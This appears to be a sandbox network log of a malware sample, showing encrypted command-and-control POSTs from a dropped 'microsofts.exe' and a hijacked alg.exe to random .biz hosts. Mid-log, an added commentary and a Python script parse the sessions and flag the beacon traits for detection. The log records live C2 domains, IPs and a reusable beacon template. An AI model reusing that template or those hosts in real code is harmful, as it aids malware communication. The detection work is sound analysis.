Set-Cookie: btst=fadd5a24bc023f7c2e78b09ba5e8cbce|173.254.250.76|1730822647|1730822647|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.5 | 59763 | 47.129.31.212 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:06.875323057 CET | 344 | OUT | POST /ix HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:06.875462055 CET | 778 | OUT | Data Raw: db e8 18 ef e7 77 91 55 fe 02 00 00 75 fe 3b 0c 15 80 6c 74 58 93 e3 0c c4 d8 78 12 50 bd d8 00 aa 93 54 b1 cd ff 39 73 97 1a 5d 5d e2 e1 30 29 fb cd cb 2e 7c 59 24 08 10 a7 40 15 7b 46 40 24 29 31 6d a1 9f 93 13 ba 91 d8 44 44 33 ac 3a 11 2e 39
Nov 5, 2024 17:04:08.312319040 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2af0a33e88815192272d3293c40d2c45|173.254.250.76|1730822648|1730822648|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.5 | 59764 | 34.211.97.45 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:07.371391058 CET | 354 | OUT | POST /vxsjaatihrjtd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:07.371409893 CET | 828 | OUT | Data Raw: ec bd 42 3a 69 87 5b c7 30 03 00 00 0a 6a 10 e6 51 5c cb f1 7e 93 13 b6 68 94 52 c4 7c 4e 21 cd 93 2c f0 32 58 07 be 34 a3 cf ab f6 8b fe 86 9f cc 75 eb 41 2c 81 7b 58 46 ec cc b4 65 86 6a dc ed 38 9b 45 05 17 c6 d7 22 c9 34 e1 38 f1 8d bc 27 6e
Nov 5, 2024 17:04:08.215600014 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=44aedcfaca3602994e6a7480febc9409|173.254.250.76|1730822648|1730822648|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.5 | 59765 | 3.94.10.34 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:08.254694939 CET | 353 | OUT | POST /qvkbehfy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:08.254714012 CET | 828 | OUT | Data Raw: fc 25 9f 3f 68 3e 7b 7c 30 03 00 00 f8 c8 1a 16 bc 08 27 57 f6 d9 85 a7 20 86 d7 25 b2 a9 17 2d ee 46 57 f4 1f f3 22 bd 16 ab 08 54 da e3 57 2a ce f1 d9 da bb cf 56 62 07 46 14 bc 46 fd 1b ba ba 70 b6 43 3f 6f a5 cf b1 2b 32 c9 07 1b 35 a3 34 3b
Data Ascii: %?h>{|0'W %-FW"TW*VbFFpC?o+254;]#z1l@<DlKt|$ih>`kana(9|4ofU\"AqQg#^4(&O%?]M3gtJ45&I[;KZwd""
Nov 5, 2024 17:04:08.916470051 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d7c9d86b5a0aabbce9c5b8b1ea84760e|173.254.250.76|1730822648|1730822648|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.5 | 59766 | 18.208.156.248 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:08.642319918 CET | 355 | OUT | POST /rujiughdxo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:08.642338991 CET | 778 | OUT | Data Raw: aa 89 8c 13 7f 27 96 7f fe 02 00 00 33 c1 ae 8d 05 64 35 d6 59 f8 40 e1 00 bd f7 16 df 4d 54 e2 37 67 e8 f1 96 da 19 c6 71 26 fe 18 3b 24 9d 75 1d a2 b5 29 18 c9 2a b3 86 f1 6c 67 28 8a 6f 6c e7 19 e4 d5 4c 99 ee 89 e1 b3 b5 8b e6 72 a7 2b 23 5c
Data Ascii: '3d5Y@MT7gq&;$u)*lg(olLr+#\jef8QEG,T<t0ki|2sRX.A`b8ZfNgwM(u.H{9pZ29tW('31J*$h_",wM]jz=d
Nov 5, 2024 17:04:09.334265947 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=11da9677cc34dbc9fd9c359c4ee11996|173.254.250.76|1730822649|1730822649|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.5 | 59767 | 18.246.231.120 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:08.988497019 CET | 348 | OUT | POST /bhfem HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:08.988497019 CET | 828 | OUT | Data Raw: b4 a9 a3 d9 b6 d0 e4 30 30 03 00 00 db e6 13 76 fd 63 15 f3 be 3b 67 ac ac 31 58 fc 91 c0 87 ef 98 d1 0d 7f eb fc ad cb 83 6a 7c 36 b8 28 92 fc 8a 2c b9 d1 74 8e b8 94 67 fc 9c c2 ed 62 1e 43 df 4a ff a3 d4 2a e6 0d 3b ed 6d 7b 95 d4 10 5c c8 d3
Data Ascii: 00vc;g1Xj|6(,tgbCJ*;m{\hP&fvT[f]*z?!D@!VvPxs),L[Qm0K_H^0@cD`6u_#EN
Nov 5, 2024 17:04:09.810683966 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=67a8131cfb2530541b9820e34d33661c|173.254.250.76|1730822649|1730822649|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


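Every session above follows one template: a POST to a random lowercase path on a random-looking .biz host, the same hard-coded WeChat/QQBrowser User-Agent, a few hundred bytes of opaque body, and a nginx "200 OK" whose chunked body is empty, sent by both the dropped microsofts.exe and by C:\Windows\System32\alg.exe, a Windows service binary with no reason to post to .biz domains. The following Python is an added example, not part of the Joe Sandbox report: it parses the undelimited session rows exactly as they appear on this page and flags each of those traits. The embedded input is constructed from the sessions above with unneeded headers dropped; the sandbox address 192.168.2.5, the assumption that source ports are five-digit ephemeral ports, the 80/443 destination ports and the body-size and path-length thresholds are my own choices, used only to make the row parse unambiguous and the checks concrete.

```python
import re

# Constructed input: three session records copied from the report above in the
# flattened one-line-per-row form the page shows; headers the checks do not
# need are left out.
REPORT = r"""
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
95192.168.2.5597653.94.10.34801816C:\Users\user\AppData\Local\Temp\microsofts.exe
TimestampBytes transferredDirectionData
Nov 5, 2024 17:04:08.254694939 CET353OUTPOST /qvkbehfy HTTP/1.1
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:08.916470051 CET417INHTTP/1.1 200 OK
Data Ascii: 0

Session IDSource IPSource PortDestination IPDestination PortPIDProcess
96192.168.2.55976618.208.156.248801492C:\Windows\System32\alg.exe
TimestampBytes transferredDirectionData
Nov 5, 2024 17:04:08.642319918 CET355OUTPOST /rujiughdxo HTTP/1.1
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:09.334265947 CET417INHTTP/1.1 200 OK
Data Ascii: 0

Session IDSource IPSource PortDestination IPDestination PortPIDProcess
97192.168.2.55976718.246.231.120801816C:\Users\user\AppData\Local\Temp\microsofts.exe
TimestampBytes transferredDirectionData
Nov 5, 2024 17:04:08.988497019 CET348OUTPOST /bhfem HTTP/1.1
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:09.810683966 CET415INHTTP/1.1 200 OK
Data Ascii: 0
"""

SANDBOX_IP = "192.168.2.5"  # the analysis VM's address in the report (assumption: constant)

# The session row has no delimiters, so "...5976" + "53.94.10.34..." would be an
# equally valid split. Anchoring on the known sandbox IP, a five-digit ephemeral
# source port and an HTTP(S) destination port (assumptions) makes it unambiguous.
ROW_RE = re.compile(
    r"^(?P<sid>\d+)" + re.escape(SANDBOX_IP) + r"(?P<sport>\d{5})"
    r"(?P<dst>(?:\d{1,3}\.){3}\d{1,3})(?P<dport>80|443)(?P<pid>\d+)(?P<proc>[A-Za-z]:\\.*)$"
)
# "Nov 5, 2024 17:04:08.254694939 CET353OUTPOST ..." -> timestamp, bytes, direction, data
DATA_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)"
    r"(?P<bytes>\d+)(?P<dir>IN|OUT)(?P<data>.*)$"
)


def parse_sessions(text):
    """Split the flattened report into one dict per TCP session."""
    sessions, cur = [], None
    for line in text.splitlines():
        row = ROW_RE.match(line)
        if row:
            cur = {**row.groupdict(), "headers": {}, "request": None,
                   "response": None, "response_body": None}
            sessions.append(cur)
        elif cur is None:
            continue
        elif (m := DATA_RE.match(line)):
            key = "request" if m["dir"] == "OUT" else "response"
            cur[key] = cur[key] or m["data"]  # keep the first line of each direction
        elif line.startswith("Data Ascii: ") and cur["response"]:
            cur["response_body"] = line[len("Data Ascii: "):]  # "0" = empty chunked body
        elif ": " in line and cur["response"] is None and not line.startswith("Data "):
            k, v = line.split(": ", 1)
            cur["headers"][k] = v  # request header
    return sessions


UA_MARK = "MicroMessenger/6.5.2.501"  # hard-coded WeChat UA shared by every request above
SYSTEM_BINARIES = {r"c:\windows\system32\alg.exe"}  # service binary seen beaconing above


def beacon_indicators(s):
    """Return the traits of the C2 pattern that this session exhibits (thresholds are assumptions)."""
    h, hits = s["headers"], []
    if re.fullmatch(r"POST /[a-z]{4,16} HTTP/1\.1", s["request"] or ""):
        hits.append("POST to a random lowercase path")
    if re.fullmatch(r"[a-z]{5,16}\.biz", h.get("Host", "")):
        hits.append("random-looking .biz host")
    if UA_MARK in h.get("User-Agent", ""):
        hits.append("hard-coded WeChat/QQBrowser User-Agent")
    if 500 <= int(h.get("Content-Length", "0")) <= 1500:
        hits.append("small opaque POST body")
    if (s["response"] or "").startswith("HTTP/1.1 200") and s["response_body"] == "0":
        hits.append("200 OK with an empty chunked body")
    if s["proc"].lower() in SYSTEM_BINARIES:
        hits.append("HTTP from system binary " + s["proc"])
    return hits


def summarise(sessions):
    """Aggregate what the per-session view hides: one UA, many hosts, few processes."""
    return {
        "user_agents": len({s["headers"].get("User-Agent") for s in sessions}),
        "hosts": sorted({s["headers"].get("Host") for s in sessions}),
        "processes": sorted({s["proc"] for s in sessions}),
    }


if __name__ == "__main__":
    parsed = parse_sessions(REPORT)
    for s in parsed:
        print(s["sid"], s["proc"], "->", s["dst"], s["headers"].get("Host"), beacon_indicators(s))
    print(summarise(parsed))
```

Per session the individual traits are weak (a small POST or a .biz host alone is not evidence); the value is in the aggregate that summarise() exposes: one User-Agent, a different host per request, and the same two processes, one of them a Windows service binary. That combination is what the report's "Queries random domain names" signature is pointing at, and it is what a proxy or NetFlow rule should key on rather than any single hostname from this run.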
Session ID: 98 | Source IP: 192.168.2.5 | Source Port: 59768 | Destination IP: 13.251.16.150 | Destination Port: 80 | PID: 1492 | Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:09.950536013 CET | 354 | OUT | POST /qlckdyepimpj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:09.950536966 CET | 778 | OUT | Data Raw: b2 85 ca 6d 20 60 07 91 fe 02 00 00 1b 2f cb 33 84 f2 6d bc 7e b6 aa 1c ac 33 de e0 7f c9 5f 91 31 b8 6c 3b 66 a6 c0 29 cb be 0b 3f 57 5a af de 37 37 c5 e0 31 2e 41 85 03 fb 17 35 4a 47 1c 4a 43 01 fe 01 f8 a5 97 02 db 14 55 d2 22 e3 88 72 7a 1d
Data Ascii: m `/3m~3_1l;f)?WZ771.A5JGJCU"rz 3XIjqcNH_NRP/8=3#-y2p;BaAzxJOS!R!a?@,f)ktjN2wX#9&vi{}>U(*{"_
Nov 5, 2024 17:04:11.366755009 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=327166ddd77f6eb4ce7c1e5833c86bb4|173.254.250.76|1730822651|1730822651|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 99 | Source IP: 192.168.2.5 | Source Port: 59769 | Destination IP: 3.254.94.185 | Destination Port: 80 | PID: 1816 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:09.978607893 CET | 346 | OUT | POST /ityan HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:09.978621960 CET | 828 | OUT | Data Raw: d8 d5 9f 6e 2f 50 ef 7c 30 03 00 00 fa b3 f6 6e 22 41 96 e2 15 bc 7a db 5d 46 f7 8c e0 2a 11 68 35 3e ea be e9 cd 99 90 83 a1 ca 1a 28 6e 52 71 ee 70 ed 2c f8 c5 fc c3 27 42 e4 38 d6 5f 66 2a 76 34 ea e4 be 59 0a 79 0f 36 99 5d 13 ae aa d0 d5 47
Data Ascii: n/P|0n"Az]F*h5>(nRqp,'B8_f*v4Yy6]G?X-o9fW%wm&^'hRjwpYsjB~Cj=R5]B#RaHn\du@kspZ0{vs&2CZ%>P538c>V.rBp
Nov 5, 2024 17:04:10.946290970 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4935cd6f2dd3c2fd176a1c1690463b27|173.254.250.76|1730822650|1730822650|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 100 | Source IP: 192.168.2.5 | Source Port: 59771 | Destination IP: 85.214.228.140 | Destination Port: 80 | PID: 1816 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:11.044851065 CET | 360 | OUT | POST /mfjpaqkdwglsvxqo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:11.044873953 CET | 828 | OUT | Data Raw: 6f ca 85 a0 58 45 b1 88 30 03 00 00 f3 fe 7f 19 d7 32 0c 4b 54 62 64 e7 dc 13 ec dd 4c a4 a6 02 1d 19 40 cb 93 5b 2e 99 d4 80 ae 5e c6 b6 ae ad 00 4b 7e 1d 5d 25 7f be 63 5c aa e5 68 73 b1 61 1a df a9 96 92 17 d7 85 c2 0f ff 16 87 ae 32 3c e3 32
Data Ascii: oXE02KTbdL@[.^K~]%c\hsa2<2hrW,ubuKYbR4,0^bKpY}O$0:EO@4?.r\\`&+h'xbGm)-Gij9y:dccAO+XG
Nov 5, 2024 17:04:11.918653965 CET | 166 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Tue, 05 Nov 2024 16:04:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 101 | Source IP: 192.168.2.5 | Source Port: 59772 | Destination IP: 34.246.200.160 | Destination Port: 80 | PID: 1492 | Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:11.626034021 CET | 361 | OUT | POST /qowwyqvurlxrxabk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:11.626050949 CET | 778 | OUT | Data Raw: 4e 78 be d1 56 38 32 97 fe 02 00 00 50 21 53 76 05 a8 ac 6b f8 16 f9 35 cb 51 91 26 a2 ea 0f 7e 0f c2 30 aa 0d 4e ab 91 ba 84 e5 de 38 76 93 d9 2d d9 ca 06 97 c6 0f 1d 84 5b 78 ae 05 96 40 3f 2c 74 ae d5 47 19 9e c5 37 e8 38 07 c3 9b 38 88 b9 4a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: NxV82P!Svk5Q&~0N8v-[x@?,tG788Jz8|}"h{:G)UGKFkfgws$Pz;5JjVPsfkVDzo"}uiJ_%QnFc:AR*>P3K-a70`c<xt%i}h
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:12.593164921 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=775d358f99a07bf3d64defe30af32001|173.254.250.76|1730822652|1730822652|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.5 | 59773 | 47.129.31.212 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:11.998214960 CET | 354 | OUT | POST /tdrxmaergnh HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: oflybfv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:11.998214960 CET | 828 | OUT | Data Raw: 3a 23 aa 7f 34 26 0c 5c 30 03 00 00 d4 a8 5c ae e6 8f 42 c4 47 8a 00 10 de a8 d0 14 72 82 5e a9 6c 96 74 71 d5 31 8c 96 37 9f 9f 7e 81 44 06 23 a5 6c d0 aa a3 26 f7 d1 fa b3 85 bc 46 98 02 7f c6 20 07 56 1d 7a 5b 3a 42 c9 24 48 15 f8 04 81 e4 96
    Data Ascii: :#4&\0\BGr^ltq17~D#l&F Vz[:B$Hct{^-W~"gfZk;6wFKLU{;,ER684.9;6[!86%|<1*A%aZ^/(F4.3Iwr<0.WPqA:T
Nov 5, 2024 17:04:13.429471016 CET | 415 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:13 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=1e243ba5d90e62253356128fb9c7eeb1|173.254.250.76|1730822653|1730822653|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.5 | 59774 | 18.141.10.107 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:13.194984913 CET | 351 | OUT | POST /afeeapyp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: warkcdu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:04:13.195009947 CET | 778 | OUT | Data Raw: ba b8 f9 75 74 8e aa 09 fe 02 00 00 5d 0c c1 91 9a d4 31 e9 09 df 26 82 f1 41 52 64 a5 64 05 b9 5b 21 6d e4 f1 b2 d3 91 a3 5e 59 2f be fa 74 73 bb bd e2 b8 21 6d a8 28 19 dd 3d cc 9c e1 54 a3 8d 6f 96 35 56 60 67 c3 98 c0 c0 3e 1a bb 9b a7 55 39
    Data Ascii: ut]1&ARdd[!m^Y/ts!m(=To5V`g>U9"Cu(Lf=)2{zRc Ml*,.UmP>`FnG{aTo3ju'g^RADv9t?KlwH:VPdS\)1(3fp`Ut]Pr+
Nov 5, 2024 17:04:14.644968033 CET | 415 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:14 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2ba431b9253624f77204bad1403bdcf8|173.254.250.76|1730822654|1730822654|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.5 | 59775 | 34.211.97.45 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:13.487149954 CET | 357 | OUT | POST /obhmtmpkhrufyuif HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: yhqqc.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:13.487179041 CET | 828 | OUT | Data Raw: cf e4 96 1f 5a 17 c2 8c 30 03 00 00 c1 69 cf d3 b5 d9 84 0b 24 71 07 07 20 7a c6 c8 79 18 76 f2 fe f9 5b bd cd dc 73 f7 4c 06 41 b0 42 bf 61 0d 16 a3 4e 2f 99 c9 76 09 52 57 8e 26 f7 dc e5 2a 12 12 6b 81 2a 0a ea 45 06 99 d4 6d 04 f3 c7 92 55 6e
    Data Ascii: Z0i$q zyv[sLABaN/vRW&*k*EmUn'pM70p*;ke7VY3bQV*UyCgV3&(q}k@+y\c?z-xgh9FML!;Vw|T!Miz2iPY[[w
Nov 5, 2024 17:04:14.314207077 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
